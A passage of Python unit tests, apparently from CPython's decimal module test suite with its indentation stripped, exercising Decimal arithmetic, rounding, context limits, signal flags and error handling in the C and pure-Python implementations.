self.assertEqual(Decimal("10") // 7, 1)
# fma
self.assertEqual(Decimal("1.2").fma(Decimal("0.01"), 1), 1)
self.assertIs(Decimal("NaN").fma(7, 1).is_nan(), True)
# three arg power
self.assertEqual(pow(Decimal(10), 2, 7), 2)
# exp
self.assertEqual(Decimal("1.01").exp(), 3)
# is_normal
self.assertIs(Decimal("0.01").is_normal(), False)
# is_subnormal
self.assertIs(Decimal("0.01").is_subnormal(), True)
# ln
self.assertEqual(Decimal("20").ln(), 3)
# log10
self.assertEqual(Decimal("20").log10(), 1)
# logb
self.assertEqual(Decimal("580").logb(), 2)
# logical_invert
self.assertEqual(Decimal("10").logical_invert(), 1)
# minus
self.assertEqual(-Decimal("-10"), 10)
# multiply
self.assertEqual(Decimal("2") * 4, 8)
# next_minus
self.assertEqual(Decimal("10").next_minus(), 9)
# next_plus
self.assertEqual(Decimal("10").next_plus(), Decimal('2E+1'))
# normalize
self.assertEqual(Decimal("-10").normalize(), Decimal('-1E+1'))
# number_class
self.assertEqual(Decimal("10").number_class(), '+Normal')
# plus
self.assertEqual(+Decimal("-1"), -1)
# remainder
self.assertEqual(Decimal("10") % 7, 3)
# subtract
self.assertEqual(Decimal("10") - 7, 3)
# to_integral_exact
self.assertEqual(Decimal("1.12345").to_integral_exact(), 1)
# Boolean functions
self.assertTrue(Decimal("1").is_canonical())
self.assertTrue(Decimal("1").is_finite())
self.assertTrue(Decimal("1").is_finite())
self.assertTrue(Decimal("snan").is_snan())
self.assertTrue(Decimal("-1").is_signed())
self.assertTrue(Decimal("0").is_zero())
self.assertTrue(Decimal("0").is_zero())
# Copy
with localcontext() as c:
c.prec = 10000
x = 1228 ** 1523
y = -Decimal(x)
z = y.copy_abs()
self.assertEqual(z, x)
z = y.copy_negate()
self.assertEqual(z, x)
z = y.copy_sign(Decimal(1))
self.assertEqual(z, x)
def test_divmod(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
with localcontext() as c:
q, r = divmod(Decimal("10912837129"), 1001)
self.assertEqual(q, Decimal('10901935'))
self.assertEqual(r, Decimal('194'))
q, r = divmod(Decimal("NaN"), 7)
self.assertTrue(q.is_nan() and r.is_nan())
c.traps[InvalidOperation] = False
q, r = divmod(Decimal("NaN"), 7)
self.assertTrue(q.is_nan() and r.is_nan())
c.traps[InvalidOperation] = False
c.clear_flags()
q, r = divmod(Decimal("inf"), Decimal("inf"))
self.assertTrue(q.is_nan() and r.is_nan())
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
q, r = divmod(Decimal("inf"), 101)
self.assertTrue(q.is_infinite() and r.is_nan())
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
q, r = divmod(Decimal(0), 0)
self.assertTrue(q.is_nan() and r.is_nan())
self.assertTrue(c.flags[InvalidOperation])
c.traps[DivisionByZero] = False
c.clear_flags()
q, r = divmod(Decimal(11), 0)
self.assertTrue(q.is_infinite() and r.is_nan())
self.assertTrue(c.flags[InvalidOperation] and
c.flags[DivisionByZero])
def test_power(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
Overflow = self.decimal.Overflow
Rounded = self.decimal.Rounded
with localcontext() as c:
c.prec = 3
c.clear_flags()
self.assertEqual(Decimal("1.0") ** 100, Decimal('1.00'))
self.assertTrue(c.flags[Rounded])
c.prec = 1
c.Emax = 1
c.Emin = -1
c.clear_flags()
c.traps[Overflow] = False
self.assertEqual(Decimal(10000) ** Decimal("0.5"), Decimal('inf'))
self.assertTrue(c.flags[Overflow])
def test_quantize(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
with localcontext() as c:
c.prec = 1
c.Emax = 1
c.Emin = -1
c.traps[InvalidOperation] = False
x = Decimal(99).quantize(Decimal("1e1"))
self.assertTrue(x.is_nan())
def test_radix(self):
Decimal = self.decimal.Decimal
getcontext = self.decimal.getcontext
c = getcontext()
self.assertEqual(Decimal("1").radix(), 10)
self.assertEqual(c.radix(), 10)
def test_rop(self):
Decimal = self.decimal.Decimal
for attr in ('__radd__', '__rsub__', '__rmul__', '__rtruediv__',
'__rdivmod__', '__rmod__', '__rfloordiv__', '__rpow__'):
self.assertIs(getattr(Decimal("1"), attr)("xyz"), NotImplemented)
def test_round(self):
# Python3 behavior: round() returns Decimal
Decimal = self.decimal.Decimal
getcontext = self.decimal.getcontext
c = getcontext()
c.prec = 28
self.assertEqual(str(Decimal("9.99").__round__()), "10")
self.assertEqual(str(Decimal("9.99e-5").__round__()), "0")
self.assertEqual(str(Decimal("1.23456789").__round__(5)), "1.23457")
self.assertEqual(str(Decimal("1.2345").__round__(10)), "1.2345000000")
self.assertEqual(str(Decimal("1.2345").__round__(-10)), "0E+10")
self.assertRaises(TypeError, Decimal("1.23").__round__, "5")
self.assertRaises(TypeError, Decimal("1.23").__round__, 5, 8)
def test_create_decimal(self):
c = self.decimal.Context()
self.assertRaises(ValueError, c.create_decimal, ["%"])
def test_int(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
with localcontext() as c:
c.prec = 9999
x = Decimal(1221**1271) / 10**3923
self.assertEqual(int(x), 1)
self.assertEqual(x.to_integral(), 2)
def test_copy(self):
Context = self.decimal.Context
c = Context()
c.prec = 10000
x = -(1172 ** 1712)
y = c.copy_abs(x)
self.assertEqual(y, -x)
y = c.copy_negate(x)
self.assertEqual(y, -x)
y = c.copy_sign(x, 1)
self.assertEqual(y, -x)
class CCoverage(Coverage):
decimal = C
class PyCoverage(Coverage):
decimal = P
class PyFunctionality(unittest.TestCase):
"""Extra functionality in decimal.py"""
def test_py_alternate_formatting(self):
# triples giving a format, a Decimal, and the expected result
Decimal = P.Decimal
localcontext = P.localcontext
test_values = [
# Issue 7094: Alternate formatting (specified by #)
('.0e', '1.0', '1e+0'),
('#.0e', '1.0', '1.e+0'),
('.0f', '1.0', '1'),
('#.0f', '1.0', '1.'),
('g', '1.1', '1.1'),
('#g', '1.1', '1.1'),
('.0g', '1', '1'),
('#.0g', '1', '1.'),
('.0%', '1.0', '100%'),
('#.0%', '1.0', '100.%'),
]
for fmt, d, result in test_values:
self.assertEqual(format(Decimal(d), fmt), result)
class PyWhitebox(unittest.TestCase):
"""White box testing for decimal.py"""
def test_py_exact_power(self):
# Rarely exercised lines in _power_exact.
Decimal = P.Decimal
localcontext = P.localcontext
with localcontext() as c:
c.prec = 8
x = Decimal(2**16) ** Decimal("-0.5")
self.assertEqual(x, Decimal('0.00390625'))
x = Decimal(2**16) ** Decimal("-0.6")
self.assertEqual(x, Decimal('0.0012885819'))
x = Decimal("256e7") ** Decimal("-0.5")
x = Decimal(152587890625) ** Decimal('-0.0625')
self.assertEqual(x, Decimal("0.2"))
x = Decimal("152587890625e7") ** Decimal('-0.0625')
x = Decimal(5**2659) ** Decimal('-0.0625')
c.prec = 1
x = Decimal("152587890625") ** Decimal('-0.5')
c.prec = 201
x = Decimal(2**578) ** Decimal("-0.5")
def test_py_immutability_operations(self):
# Do operations and check that it didn't change internal objects.
Decimal = P.Decimal
DefaultContext = P.DefaultContext
setcontext = P.setcontext
c = DefaultContext.copy()
c.traps = dict((s, 0) for s in OrderedSignals[P])
setcontext(c)
d1 = Decimal('-25e55')
b1 = Decimal('-25e55')
d2 = Decimal('33e+33')
b2 = Decimal('33e+33')
def checkSameDec(operation, useOther=False):
if useOther:
eval("d1." + operation + "(d2)")
self.assertEqual(d1._sign, b1._sign)
self.assertEqual(d1._int, b1._int)
self.assertEqual(d1._exp, b1._exp)
self.assertEqual(d2._sign, b2._sign)
self.assertEqual(d2._int, b2._int)
self.assertEqual(d2._exp, b2._exp)
else:
eval("d1." + operation + "()")
self.assertEqual(d1._sign, b1._sign)
self.assertEqual(d1._int, b1._int)
self.assertEqual(d1._exp, b1._exp)
Decimal(d1)
self.assertEqual(d1._sign, b1._sign)
self.assertEqual(d1._int, b1._int)
self.assertEqual(d1._exp, b1._exp)
checkSameDec("__abs__")
checkSameDec("__add__", True)
checkSameDec("__divmod__", True)
checkSameDec("__eq__", True)
checkSameDec("__ne__", True)
checkSameDec("__le__", True)
checkSameDec("__lt__", True)
checkSameDec("__ge__", True)
checkSameDec("__gt__", True)
checkSameDec("__float__")
checkSameDec("__floordiv__", True)
checkSameDec("__hash__")
checkSameDec("__int__")
checkSameDec("__trunc__")
checkSameDec("__mod__", True)
checkSameDec("__mul__", True)
checkSameDec("__neg__")
checkSameDec("__bool__")
checkSameDec("__pos__")
checkSameDec("__pow__", True)
checkSameDec("__radd__", True)
checkSameDec("__rdivmod__", True)
checkSameDec("__repr__")
checkSameDec("__rfloordiv__", True)
checkSameDec("__rmod__", True)
checkSameDec("__rmul__", True)
checkSameDec("__rpow__", True)
checkSameDec("__rsub__", True)
checkSameDec("__str__")
checkSameDec("__sub__", True)
checkSameDec("__truediv__", True)
checkSameDec("adjusted")
checkSameDec("as_tuple")
checkSameDec("compare", True)
checkSameDec("max", True)
checkSameDec("min", True)
checkSameDec("normalize")
checkSameDec("quantize", True)
checkSameDec("remainder_near", True)
checkSameDec("same_quantum", True)
checkSameDec("sqrt")
checkSameDec("to_eng_string")
checkSameDec("to_integral")
def test_py_decimal_id(self):
Decimal = P.Decimal
d = Decimal(45)
e = Decimal(d)
self.assertEqual(str(e), '45')
self.assertNotEqual(id(d), id(e))
def test_py_rescale(self):
# Coverage
Decimal = P.Decimal
localcontext = P.localcontext
with localcontext() as c:
x = Decimal("NaN")._rescale(3, ROUND_UP)
self.assertTrue(x.is_nan())
def test_py__round(self):
# Coverage
Decimal = P.Decimal
self.assertRaises(ValueError, Decimal("3.1234")._round, 0, ROUND_UP)
class CFunctionality(unittest.TestCase):
"""Extra functionality in _decimal"""
@requires_extra_functionality
def test_c_ieee_context(self):
# issue 8786: Add support for IEEE 754 contexts to decimal module.
IEEEContext = C.IEEEContext
DECIMAL32 = C.DECIMAL32
DECIMAL64 = C.DECIMAL64
DECIMAL128 = C.DECIMAL128
def assert_rest(self, context):
self.assertEqual(context.clamp, 1)
assert_signals(self, context, 'traps', [])
assert_signals(self, context, 'flags', [])
c = IEEEContext(DECIMAL32)
self.assertEqual(c.prec, 7)
self.assertEqual(c.Emax, 96)
self.assertEqual(c.Emin, -95)
assert_rest(self, c)
c = IEEEContext(DECIMAL64)
self.assertEqual(c.prec, 16)
self.assertEqual(c.Emax, 384)
self.assertEqual(c.Emin, -383)
assert_rest(self, c)
c = IEEEContext(DECIMAL128)
self.assertEqual(c.prec, 34)
self.assertEqual(c.Emax, 6144)
self.assertEqual(c.Emin, -6143)
assert_rest(self, c)
# Invalid values
self.assertRaises(OverflowError, IEEEContext, 2**63)
self.assertRaises(ValueError, IEEEContext, -1)
self.assertRaises(ValueError, IEEEContext, 1024)
@requires_extra_functionality
def test_c_context(self):
Context = C.Context
c = Context(flags=C.DecClamped, traps=C.DecRounded)
self.assertEqual(c._flags, C.DecClamped)
self.assertEqual(c._traps, C.DecRounded)
@requires_extra_functionality
def test_constants(self):
# Condition flags
cond = (
C.DecClamped, C.DecConversionSyntax, C.DecDivisionByZero,
C.DecDivisionImpossible, C.DecDivisionUndefined,
C.DecFpuError, C.DecInexact, C.DecInvalidContext,
C.DecInvalidOperation, C.DecMallocError,
C.DecFloatOperation, C.DecOverflow, C.DecRounded,
C.DecSubnormal, C.DecUnderflow
)
# IEEEContext
self.assertEqual(C.DECIMAL32, 32)
self.assertEqual(C.DECIMAL64, 64)
self.assertEqual(C.DECIMAL128, 128)
self.assertEqual(C.IEEE_CONTEXT_MAX_BITS, 512)
# Conditions
for i, v in enumerate(cond):
self.assertEqual(v, 1<<i)
self.assertEqual(C.DecIEEEInvalidOperation,
C.DecConversionSyntax|
C.DecDivisionImpossible|
C.DecDivisionUndefined|
C.DecFpuError|
C.DecInvalidContext|
C.DecInvalidOperation|
C.DecMallocError)
self.assertEqual(C.DecErrors,
C.DecIEEEInvalidOperation|
C.DecDivisionByZero)
self.assertEqual(C.DecTraps,
C.DecErrors|C.DecOverflow|C.DecUnderflow)
class CWhitebox(unittest.TestCase):
"""Whitebox testing for _decimal"""
def test_bignum(self):
# Not exactly whitebox, but too slow with pydecimal.
Decimal = C.Decimal
localcontext = C.localcontext
b1 = 10**35
b2 = 10**36
with localcontext() as c:
c.prec = 1000000
for i in range(5):
a = random.randrange(b1, b2)
b = random.randrange(1000, 1200)
x = a ** b
y = Decimal(a) ** Decimal(b)
self.assertEqual(x, y)
def test_invalid_construction(self):
self.assertRaises(TypeError, C.Decimal, 9, "xyz")
def test_c_input_restriction(self):
# Too large for _decimal to be converted exactly
Decimal = C.Decimal
InvalidOperation = C.InvalidOperation
Context = C.Context
localcontext = C.localcontext
with localcontext(Context()):
self.assertRaises(InvalidOperation, Decimal,
"1e9999999999999999999")
def test_c_context_repr(self):
# This test is _decimal-only because flags are not printed
# in the same order.
DefaultContext = C.DefaultContext
FloatOperation = C.FloatOperation
c = DefaultContext.copy()
c.prec = 425000000
c.Emax = 425000000
c.Emin = -425000000
c.rounding = ROUND_HALF_DOWN
c.capitals = 0
c.clamp = 1
for sig in OrderedSignals[C]:
c.flags[sig] = True
c.traps[sig] = True
c.flags[FloatOperation] = True
c.traps[FloatOperation] = True
s = c.__repr__()
t = "Context(prec=425000000, rounding=ROUND_HALF_DOWN, " \
"Emin=-425000000, Emax=425000000, capitals=0, clamp=1, " \
"flags=[Clamped, InvalidOperation, DivisionByZero, Inexact, " \
"FloatOperation, Overflow, Rounded, Subnormal, Underflow], " \
"traps=[Clamped, InvalidOperation, DivisionByZero, Inexact, " \
"FloatOperation, Overflow, Rounded, Subnormal, Underflow])"
self.assertEqual(s, t)
def test_c_context_errors(self):
Context = C.Context
InvalidOperation = C.InvalidOperation
Overflow = C.Overflow
FloatOperation = C.FloatOperation
localcontext = C.localcontext
getcontext = C.getcontext
setcontext = C.setcontext
HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
c = Context()
# SignalDict: input validation
self.assertRaises(KeyError, c.flags.__setitem__, 801, 0)
self.assertRaises(KeyError, c.traps.__setitem__, 801, 0)
self.assertRaises(ValueError, c.flags.__delitem__, Overflow)
self.assertRaises(ValueError, c.traps.__delitem__, InvalidOperation)
self.assertRaises(TypeError, setattr, c, 'flags', ['x'])
self.assertRaises(TypeError, setattr, c,'traps', ['y'])
self.assertRaises(KeyError, setattr, c, 'flags', {0:1})
self.assertRaises(KeyError, setattr, c, 'traps', {0:1})
# Test assignment from a signal dict with the correct length but
# one invalid key.
d = c.flags.copy()
del d[FloatOperation]
d["XYZ"] = 91283719
self.assertRaises(KeyError, setattr, c, 'flags', d)
self.assertRaises(KeyError, setattr, c, 'traps', d)
# Input corner cases
int_max = 2**63-1 if HAVE_CONFIG_64 else 2**31-1
gt_max_emax = 10**18 if HAVE_CONFIG_64 else 10**9
# prec, Emax, Emin
for attr in ['prec', 'Emax']:
self.assertRaises(ValueError, setattr, c, attr, gt_max_emax)
self.assertRaises(ValueError, setattr, c, 'Emin', -gt_max_emax)
# prec, Emax, Emin in context constructor
self.assertRaises(ValueError, Context, prec=gt_max_emax)
self.assertRaises(ValueError, Context, Emax=gt_max_emax)
self.assertRaises(ValueError, Context, Emin=-gt_max_emax)
# Overflow in conversion
self.assertRaises(OverflowError, Context, prec=int_max+1)
self.assertRaises(OverflowError, Context, Emax=int_max+1)
self.assertRaises(OverflowError, Context, Emin=-int_max-2)
self.assertRaises(OverflowError, Context, clamp=int_max+1)
self.assertRaises(OverflowError, Context, capitals=int_max+1)
# OverflowError, general ValueError
for attr in ('prec', 'Emin', 'Emax', 'capitals', 'clamp'):
self.assertRaises(OverflowError, setattr, c, attr, int_max+1)
self.assertRaises(OverflowError, setattr, c, attr, -int_max-2)
if sys.platform != 'win32':
self.assertRaises(ValueError, setattr, c, attr, int_max)
self.assertRaises(ValueError, setattr, c, attr, -int_max-1)
# OverflowError: _unsafe_setprec, _unsafe_setemin, _unsafe_setemax
if C.MAX_PREC == 425000000:
self.assertRaises(OverflowError, getattr(c, '_unsafe_setprec'),
int_max+1)
self.assertRaises(OverflowError, getattr(c, '_unsafe_setemax'),
int_max+1)
self.assertRaises(OverflowError, getattr(c, '_unsafe_setemin'),
-int_max-2)
# ValueError: _unsafe_setprec, _unsafe_setemin, _unsafe_setemax
if C.MAX_PREC == 425000000:
self.assertRaises(ValueError, getattr(c, '_unsafe_setprec'), 0)
self.assertRaises(ValueError, getattr(c, '_unsafe_setprec'),
1070000001)
self.assertRaises(ValueError, getattr(c, '_unsafe_setemax'), -1)
self.assertRaises(ValueError, getattr(c, '_unsafe_setemax'),
1070000001)
self.assertRaises(ValueError, getattr(c, '_unsafe_setemin'),
-1070000001)
self.assertRaises(ValueError, getattr(c, '_unsafe_setemin'), 1)
# capitals, clamp
for attr in ['capitals', 'clamp']:
self.assertRaises(ValueError, setattr, c, attr, -1)
self.assertRaises(ValueError, setattr, c, attr, 2)
self.assertRaises(TypeError, setattr, c, attr, [1,2,3])
if HAVE_CONFIG_64:
self.assertRaises(ValueError, setattr, c, attr, 2**32)
self.assertRaises(ValueError, setattr, c, attr, 2**32+1)
# Invalid local context
self.assertRaises(TypeError, exec, 'with localcontext("xyz"): pass',
locals())
self.assertRaises(TypeError, exec,
'with localcontext(context=getcontext()): pass',
locals())
# setcontext
saved_context = getcontext()
self.assertRaises(TypeError, setcontext, "xyz")
setcontext(saved_context)
def test_rounding_strings_interned(self):
self.assertIs(C.ROUND_UP, P.ROUND_UP)
self.assertIs(C.ROUND_DOWN, P.ROUND_DOWN)
self.assertIs(C.ROUND_CEILING, P.ROUND_CEILING)
self.assertIs(C.ROUND_FLOOR, P.ROUND_FLOOR)
self.assertIs(C.ROUND_HALF_UP, P.ROUND_HALF_UP)
self.assertIs(C.ROUND_HALF_DOWN, P.ROUND_HALF_DOWN)
self.assertIs(C.ROUND_HALF_EVEN, P.ROUND_HALF_EVEN)
self.assertIs(C.ROUND_05UP, P.ROUND_05UP)
@requires_extra_functionality
def test_c_context_errors_extra(self):
Context = C.Context
InvalidOperation = C.InvalidOperation
Overflow = C.Overflow
localcontext = C.localcontext
getcontext = C.getcontext
setcontext = C.setcontext
HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
c = Context()
# Input corner cases
int_max = 2**63-1 if HAVE_CONFIG_64 else 2**31-1
# OverflowError, general ValueError
self.assertRaises(OverflowError, setattr, c, '_allcr', int_max+1)
self.assertRaises(OverflowError, setattr, c, '_allcr', -int_max-2)
if sys.platform != 'win32':
self.assertRaises(ValueError, setattr, c, '_allcr', int_max)
self.assertRaises(ValueError, setattr, c, '_allcr', -int_max-1)
# OverflowError, general TypeError
for attr in ('_flags', '_traps'):
self.assertRaises(OverflowError, setattr, c, attr, int_max+1)
self.assertRaises(OverflowError, setattr, c, attr, -int_max-2)
if sys.platform != 'win32':
self.assertRaises(TypeError, setattr, c, attr, int_max)
self.assertRaises(TypeError, setattr, c, attr, -int_max-1)
# _allcr
self.assertRaises(ValueError, setattr, c, '_allcr', -1)
self.assertRaises(ValueError, setattr, c, '_allcr', 2)
self.assertRaises(TypeError, setattr, c, '_allcr', [1,2,3])
if HAVE_CONFIG_64:
self.assertRaises(ValueError, setattr, c, '_allcr', 2**32)
self.assertRaises(ValueError, setattr, c, '_allcr', 2**32+1)
# _flags, _traps
for attr in ['_flags', '_traps']:
self.assertRaises(TypeError, setattr, c, attr, 999999)
self.assertRaises(TypeError, setattr, c, attr, 'x')
def test_c_valid_context(self):
# These tests are for code coverage in _decimal.
DefaultContext = C.DefaultContext
Clamped = C.Clamped
Underflow = C.Underflow
Inexact = C.Inexact
Rounded = C.Rounded
Subnormal = C.Subnormal
c = DefaultContext.copy()
# Exercise all getters and setters
c.prec = 34
c.rounding = ROUND_HALF_UP
c.Emax = 3000
c.Emin = -3000
c.capitals = 1
c.clamp = 0
self.assertEqual(c.prec, 34)
self.assertEqual(c.rounding, ROUND_HALF_UP)
self.assertEqual(c.Emin, -3000)
self.assertEqual(c.Emax, 3000)
self.assertEqual(c.capitals, 1)
self.assertEqual(c.clamp, 0)
self.assertEqual(c.Etiny(), -3033)
self.assertEqual(c.Etop(), 2967)
# Exercise all unsafe setters
if C.MAX_PREC == 425000000:
c._unsafe_setprec(999999999)
c._unsafe_setemax(999999999)
c._unsafe_setemin(-999999999)
self.assertEqual(c.prec, 999999999)
self.assertEqual(c.Emax, 999999999)
self.assertEqual(c.Emin, -999999999)
@requires_extra_functionality
def test_c_valid_context_extra(self):
DefaultContext = C.DefaultContext
c = DefaultContext.copy()
self.assertEqual(c._allcr, 1)
c._allcr = 0
self.assertEqual(c._allcr, 0)
def test_c_round(self):
# Restricted input.
Decimal = C.Decimal
InvalidOperation = C.InvalidOperation
localcontext = C.localcontext
MAX_EMAX = C.MAX_EMAX
MIN_ETINY = C.MIN_ETINY
int_max = 2**63-1 if C.MAX_PREC > 425000000 else 2**31-1
with localcontext() as c:
c.traps[InvalidOperation] = True
self.assertRaises(InvalidOperation, Decimal("1.23").__round__,
-int_max-1)
self.assertRaises(InvalidOperation, Decimal("1.23").__round__,
int_max)
self.assertRaises(InvalidOperation, Decimal("1").__round__,
int(MAX_EMAX+1))
self.assertRaises(C.InvalidOperation, Decimal("1").__round__,
-int(MIN_ETINY-1))
self.assertRaises(OverflowError, Decimal("1.23").__round__,
-int_max-2)
self.assertRaises(OverflowError, Decimal("1.23").__round__,
int_max+1)
def test_c_format(self):
# Restricted input
Decimal = C.Decimal
HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
self.assertRaises(TypeError, Decimal(1).__format__, "=10.10", [], 9)
self.assertRaises(TypeError, Decimal(1).__format__, "=10.10", 9)
self.assertRaises(TypeError, Decimal(1).__format__, [])
self.assertRaises(ValueError, Decimal(1).__format__, "<>=10.10")
maxsize = 2**63-1 if HAVE_CONFIG_64 else 2**31-1
self.assertRaises(ValueError, Decimal("1.23456789").__format__,
"=%d.1" % maxsize)
def test_c_integral(self):
Decimal = C.Decimal
Inexact = C.Inexact
localcontext = C.localcontext
x = Decimal(10)
self.assertEqual(x.to_integral(), 10)
self.assertRaises(TypeError, x.to_integral, '10')
self.assertRaises(TypeError, x.to_integral, 10, 'x')
self.assertRaises(TypeError, x.to_integral, 10)
self.assertEqual(x.to_integral_value(), 10)
self.assertRaises(TypeError, x.to_integral_value, '10')
self.assertRaises(TypeError, x.to_integral_value, 10, 'x')
self.assertRaises(TypeError, x.to_integral_value, 10)
self.assertEqual(x.to_integral_exact(), 10)
self.assertRaises(TypeError, x.to_integral_exact, '10')
self.assertRaises(TypeError, x.to_integral_exact, 10, 'x')
self.assertRaises(TypeError, x.to_integral_exact, 10)
with localcontext() as c:
x = Decimal("99999999999999999999999999.9").to_integral_value(ROUND_UP)
self.assertEqual(x, Decimal('100000000000000000000000000'))
x = Decimal("99999999999999999999999999.9").to_integral_exact(ROUND_UP)
self.assertEqual(x, Decimal('100000000000000000000000000'))
c.traps[Inexact] = True
self.assertRaises(Inexact, Decimal("999.9").to_integral_exact, ROUND_UP)
def test_c_funcs(self):
# Invalid arguments
Decimal = C.Decimal
InvalidOperation = C.InvalidOperation
DivisionByZero = C.DivisionByZero
getcontext = C.getcontext
localcontext = C.localcontext
self.assertEqual(Decimal('9.99e10').to_eng_string(), '99.9E+9')
self.assertRaises(TypeError, pow, Decimal(1), 2, "3")
self.assertRaises(TypeError, Decimal(9).number_class, "x", "y")
self.assertRaises(TypeError, Decimal(9).same_quantum, 3, "x", "y")
self.assertRaises(
TypeError,
Decimal("1.23456789").quantize, Decimal('1e-100000'), []
)
self.assertRaises(
TypeError,
Decimal("1.23456789").quantize, Decimal('1e-100000'), getcontext()
)
self.assertRaises(
TypeError,
Decimal("1.23456789").quantize, Decimal('1e-100000'), 10
)
self.assertRaises(
TypeError,
Decimal("1.23456789").quantize, Decimal('1e-100000'), ROUND_UP, 1000
)
with localcontext() as c:
c.clear_traps()
# Invalid arguments
self.assertRaises(TypeError, c.copy_sign, Decimal(1), "x", "y")
self.assertRaises(TypeError, c.canonical, 200)
self.assertRaises(TypeError, c.is_canonical, 200)
self.assertRaises(TypeError, c.divmod, 9, 8, "x", "y")
self.assertRaises(TypeError, c.same_quantum, 9, 3, "x", "y")
self.assertEqual(str(c.canonical(Decimal(200))), '200')
self.assertEqual(c.radix(), 10)
c.traps[DivisionByZero] = True
self.assertRaises(DivisionByZero, Decimal(9).__divmod__, 0)
self.assertRaises(DivisionByZero, c.divmod, 9, 0)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
c.traps[InvalidOperation] = True
self.assertRaises(InvalidOperation, Decimal(9).__divmod__, 0)
self.assertRaises(InvalidOperation, c.divmod, 9, 0)
self.assertTrue(c.flags[DivisionByZero])
c.traps[InvalidOperation] = True
c.prec = 2
self.assertRaises(InvalidOperation, pow, Decimal(1000), 1, 501)
def test_va_args_exceptions(self):
Decimal = C.Decimal
Context = C.Context
x = Decimal("10001111111")
for attr in ['exp', 'is_normal', 'is_subnormal', 'ln', 'log10',
'logb', 'logical_invert', 'next_minus', 'next_plus',
'normalize', 'number_class', 'sqrt', 'to_eng_string']:
func = getattr(x, attr)
self.assertRaises(TypeError, func, context="x")
self.assertRaises(TypeError, func, "x", context=None)
for attr in ['compare', 'compare_signal', 'logical_and',
'logical_or', 'max', 'max_mag', 'min', 'min_mag',
'remainder_near', 'rotate', 'scaleb', 'shift']:
func = getattr(x, attr)
self.assertRaises(TypeError, func, context="x")
self.assertRaises(TypeError, func, "x", context=None)
self.assertRaises(TypeError, x.to_integral, rounding=None, context=[])
self.assertRaises(TypeError, x.to_integral, rounding={}, context=[])
self.assertRaises(TypeError, x.to_integral, [], [])
self.assertRaises(TypeError, x.to_integral_value, rounding=None, context=[])
self.assertRaises(TypeError, x.to_integral_value, rounding={}, context=[])
self.assertRaises(TypeError, x.to_integral_value, [], [])
self.assertRaises(TypeError, x.to_integral_exact, rounding=None, context=[])
self.assertRaises(TypeError, x.to_integral_exact, rounding={}, context=[])
self.assertRaises(TypeError, x.to_integral_exact, [], [])
self.assertRaises(TypeError, x.fma, 1, 2, context="x")
self.assertRaises(TypeError, x.fma, 1, 2, "x", context=None)
self.assertRaises(TypeError, x.quantize, 1, [], context=None)
self.assertRaises(TypeError, x.quantize, 1, [], rounding=None)
self.assertRaises(TypeError, x.quantize, 1, [], [])
c = Context()
self.assertRaises(TypeError, c.power, 1, 2, mod="x")
self.assertRaises(TypeError, c.power, 1, "x", mod=None)
self.assertRaises(TypeError, c.power, "x", 2, mod=None)
@requires_extra_functionality
def test_c_context_templates(self):
self.assertEqual(
C.BasicContext._traps,
C.DecIEEEInvalidOperation|C.DecDivisionByZero|C.DecOverflow|
C.DecUnderflow|C.DecClamped
)
self.assertEqual(
C.DefaultContext._traps,
C.DecIEEEInvalidOperation|C.DecDivisionByZero|C.DecOverflow
)
@requires_extra_functionality
def test_c_signal_dict(self):
# SignalDict coverage
Context = C.Context
DefaultContext = C.DefaultContext
InvalidOperation = C.InvalidOperation
DivisionByZero = C.DivisionByZero
Overflow = C.Overflow
Subnormal = C.Subnormal
Underflow = C.Underflow
Rounded = C.Rounded
Inexact = C.Inexact
Clamped = C.Clamped
DecClamped = C.DecClamped
DecInvalidOperation = C.DecInvalidOperation
DecIEEEInvalidOperation = C.DecIEEEInvalidOperation
def assertIsExclusivelySet(signal, signal_dict):
for sig in signal_dict:
if sig == signal:
self.assertTrue(signal_dict[sig])
else:
self.assertFalse(signal_dict[sig])
c = DefaultContext.copy()
# Signal dict methods
self.assertTrue(Overflow in c.traps)
c.clear_traps()
for k in c.traps.keys():
c.traps[k] = True
for v in c.traps.values():
self.assertTrue(v)
c.clear_traps()
for k, v in c.traps.items():
self.assertFalse(v)
self.assertFalse(c.flags.get(Overflow))
self.assertIs(c.flags.get("x"), None)
self.assertEqual(c.flags.get("x", "y"), "y")
self.assertRaises(TypeError, c.flags.get, "x", "y", "z")
self.assertEqual(len(c.flags), len(c.traps))
s = sys.getsizeof(c.flags)
s = sys.getsizeof(c.traps)
s = c.flags.__repr__()
# Set flags/traps.
c.clear_flags()
c._flags = DecClamped
self.assertTrue(c.flags[Clamped])
c.clear_traps()
c._traps = DecInvalidOperation
self.assertTrue(c.traps[InvalidOperation])
# Set flags/traps from dictionary.
c.clear_flags()
d = c.flags.copy()
d[DivisionByZero] = True
c.flags = d
assertIsExclusivelySet(DivisionByZero, c.flags)
c.clear_traps()
d = c.traps.copy()
d[Underflow] = True
c.traps = d
assertIsExclusivelySet(Underflow, c.traps)
# Random constructors
IntSignals = {
Clamped: C.DecClamped,
Rounded: C.DecRounded,
Inexact: C.DecInexact,
Subnormal: C.DecSubnormal,
Underflow: C.DecUnderflow,
Overflow: C.DecOverflow,
DivisionByZero: C.DecDivisionByZero,
InvalidOperation: C.DecIEEEInvalidOperation
}
IntCond = [
C.DecDivisionImpossible, C.DecDivisionUndefined, C.DecFpuError,
C.DecInvalidContext, C.DecInvalidOperation, C.DecMallocError,
C.DecConversionSyntax,
]
lim = len(OrderedSignals[C])
for r in range(lim):
for t in range(lim):
for round in RoundingModes:
flags = random.sample(OrderedSignals[C], r)
traps = random.sample(OrderedSignals[C], t)
prec = random.randrange(1, 10000)
emin = random.randrange(-10000, 0)
emax = random.randrange(0, 10000)
clamp = random.randrange(0, 2)
caps = random.randrange(0, 2)
cr = random.randrange(0, 2)
c = Context(prec=prec, rounding=round, Emin=emin, Emax=emax,
capitals=caps, clamp=clamp, flags=list(flags),
traps=list(traps))
self.assertEqual(c.prec, prec)
self.assertEqual(c.rounding, round)
self.assertEqual(c.Emin, emin)
self.assertEqual(c.Emax, emax)
